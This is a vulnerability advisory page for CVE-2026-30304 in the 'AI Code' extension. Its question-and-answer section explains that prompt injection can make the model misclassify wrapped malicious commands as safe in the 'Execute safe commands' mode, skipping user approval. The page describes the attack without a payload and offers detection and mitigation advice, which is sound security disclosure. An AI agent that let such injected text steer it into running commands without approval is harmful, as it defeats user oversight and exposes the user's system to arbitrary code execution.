CVE-2026-30304
Prompt Injection Vulnerability in AI Code Enables Arbitrary Command Execution
Publication date: 2026-03-27
Last updated on: 2026-04-03
Assigner: MITRE
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| tianguaduizhang | ai_code | to 3.12.4 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-20 | The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability exists in the AI Code product's automatic terminal command execution feature, which has two modes: "Execute safe commands" and "Execute all commands." In the "Execute safe commands" mode, the AI model automatically executes commands it deems safe, while commands considered potentially destructive require user approval.
However, the design is vulnerable to prompt injection attacks. An attacker can craft a generic template that wraps malicious commands and tricks the AI model into misclassifying these commands as safe. This bypasses the user approval step and allows arbitrary command execution on the target system.
How can this vulnerability impact me? :
The vulnerability allows an attacker to remotely execute arbitrary commands on the affected system without user approval. This can lead to full code execution, potentially compromising the system's security, integrity, and confidentiality.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability involves the AI Code product's automatic terminal command execution feature being susceptible to prompt injection attacks, which can lead to arbitrary command execution. Detection would involve monitoring for unusual or unauthorized command executions initiated by the AI Code extension, especially commands that bypass user approval.
Since the vulnerability exploits the AI model's misclassification of malicious commands as safe, detection could include auditing the commands executed automatically by the AI Code extension and checking for unexpected or suspicious commands.
Specific commands to detect this vulnerability are not provided in the available resources.
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps are not explicitly detailed in the provided resources.
However, general best practices would include disabling the automatic execution of commands in AI Code, especially the "Execute safe commands" mode that is vulnerable to prompt injection attacks.
Additionally, applying updates or patches to the AI Code extension (version > 3.12.4) once available, or removing the vulnerable extension until a fix is released, would help mitigate the risk.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The provided information does not specify how this vulnerability impacts compliance with common standards and regulations such as GDPR or HIPAA.